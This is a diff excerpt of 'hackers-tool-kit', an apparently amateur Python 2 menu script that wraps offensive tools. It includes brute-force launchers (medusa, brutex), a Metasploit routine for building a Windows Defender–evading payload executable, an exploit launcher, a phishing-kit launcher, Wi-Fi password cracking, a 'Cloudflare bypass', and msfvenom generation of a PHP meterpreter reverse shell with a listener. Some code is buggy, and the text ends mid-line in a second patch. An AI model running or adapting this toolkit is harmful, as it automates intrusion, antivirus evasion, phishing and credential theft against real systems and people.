hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "would you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From da41792ce62a6498c7b028540e84fa692b62a196 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:02:23 +0100 Subject: [PATCH 119/214] Add files via upload --- htk.py | 2740 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2740 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..72131e3 --- /dev/null +++ b/htk.py @@ -0,0 +1,2740 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting 